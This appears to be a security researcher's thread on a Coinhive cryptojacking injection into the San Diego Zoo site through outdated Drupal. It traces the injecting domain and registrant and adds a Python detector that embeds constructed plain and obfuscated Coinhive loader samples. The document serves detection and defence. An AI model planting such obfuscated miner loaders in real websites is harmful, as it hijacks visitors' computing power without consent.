#Coinhive found on the website of the San Diego Zoo (@sandiegozoo) in the latest high-profile case of #cryptojacking.
How did it get there? @ninoseki shares the details here:
As for why it happened, we can clearly see the site is running an outdated (vulnerable) version of #Drupal.
I've contacted @sandiegozoo and advised them to remove the code ASAP and update to the latest Drupal version.
Coinhive is injected via obfuscated code found in zoo.sandiegozoo.org/misc/jquery.on…
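An added example, not code from this thread or from the zoo's site: a small Python check for the kind of injection described above. It decodes the cheap obfuscation typically layered over a Coinhive loader (`\xNN` / `\uNNNN` escapes, `String.fromCharCode(...)`, string concatenation) and then looks for the miner's indicators: the `coinhive.com` domain, the `coinhive.min.js` library and the `CoinHive.Anonymous` / `CoinHive.User` / `CoinHive.Token` constructors, which are the service's own public API names. The three JavaScript snippets are constructed samples with a placeholder site key; they are not the code found on the compromised site.

```python
import re

# Constructed samples (not the injected code from the compromised site).
# CLEAN_JS: an ordinary jQuery-style snippet that must not be flagged.
CLEAN_JS = "(function($){ $(document).ready(function(){ console.log('ready'); }); })(jQuery);"

# PLAIN_COINHIVE: the unobfuscated form of a Coinhive loader, site key is a placeholder.
PLAIN_COINHIVE = """
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER', {throttle: 0.3}); miner.start();</script>
"""

# OBFUSCATED_COINHIVE: the same loader hidden with hex escapes, fromCharCode and
# string concatenation, the style of obfuscation commonly seen in injected core files.
OBFUSCATED_COINHIVE = r"""
var d=document.createElement("script");
d.src="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x63\x6f\x6d"+"/lib/"+"\x63\x6f\x69\x6e\x68\x69\x76\x65"+".min.js";
document.head.appendChild(d);
d.onload=function(){var m=new (window[String.fromCharCode(67,111,105,110,72,105,118,101)][String.fromCharCode(65,110,111,110,121,109,111,117,115)])('SITEKEY_PLACEHOLDER');m.start();};
"""

# Indicator names are assumptions for this example; the patterns match Coinhive's
# public script URL and constructor names. \W{1,6} also catches bracket access
# such as window["CoinHive"]["Anonymous"].
INDICATORS = {
    "coinhive_domain": re.compile(r"coinhive\.com", re.I),
    "coinhive_library": re.compile(r"coinhive\.min\.js", re.I),
    "coinhive_constructor": re.compile(r"CoinHive\W{1,6}(?:Anonymous|User|Token)"),
}


def deobfuscate(js: str) -> str:
    """Undo the three cheap obfuscation tricks: escapes, fromCharCode, concatenation."""

    def hex_sub(m: re.Match) -> str:
        return chr(int(m.group(1), 16))

    out = re.sub(r"\\x([0-9a-fA-F]{2})", hex_sub, js)      # "\x63" -> "c"
    out = re.sub(r"\\u([0-9a-fA-F]{4})", hex_sub, out)     # "\u0063" -> "c"

    def fcc_sub(m: re.Match) -> str:
        nums = re.findall(r"\d+", m.group(1))
        return '"' + "".join(chr(int(n)) for n in nums) + '"'

    out = re.sub(r"String\.fromCharCode\(([\d\s,]+)\)", fcc_sub, out)  # -> "CoinHive"
    out = re.sub(r"""["']\s*\+\s*["']""", "", out)          # "a"+"b" -> "ab"
    return out


def scan(js: str) -> dict:
    """Scan one script or page body; report indicators and which ones obfuscation hid."""
    decoded = deobfuscate(js)
    raw_hits = {name for name, pat in INDICATORS.items() if pat.search(js)}
    all_hits = {name for name, pat in INDICATORS.items() if pat.search(decoded)}
    return {
        "indicators": sorted(all_hits),
        "hidden_by_obfuscation": sorted(all_hits - raw_hits),
        "flagged": bool(all_hits),
    }


if __name__ == "__main__":
    for label, sample in [("clean", CLEAN_JS), ("plain", PLAIN_COINHIVE), ("obfuscated", OBFUSCATED_COINHIVE)]:
        print(label, scan(sample))
```

Run it against the contents of every first-party script a page loads, not just the HTML, since the injection here sat inside a Drupal core jQuery file rather than in the page itself. Anything reported under `hidden_by_obfuscation` is worth treating as hostile on sight: a legitimate Coinhive deployment had no reason to hex-escape its own domain.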
So who owns vuuwd.com?
WHOIS records indicate it belongs to "X XYZ" who lives on "joker joker" street in China.
While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information.
For now we'll stick with the facts at hand:
@sandiegozoo's website compromised to run #Coinhive
Domain used to inject the malware: vuuwd.com
Current hosting provider: @QuadraNet
Domain registrar: @Namecheap
Looking at the historical DNS records on @securitytrails we find vuuwd.com was recently involved in Monero (XMR) mining operations. So it seems fitting to continue the trend with today's cryptojacking incident using #Coinhive.
#Coinhive has been removed from the @sandiegozoo website. @urlscanio confirms the site is clean now as well.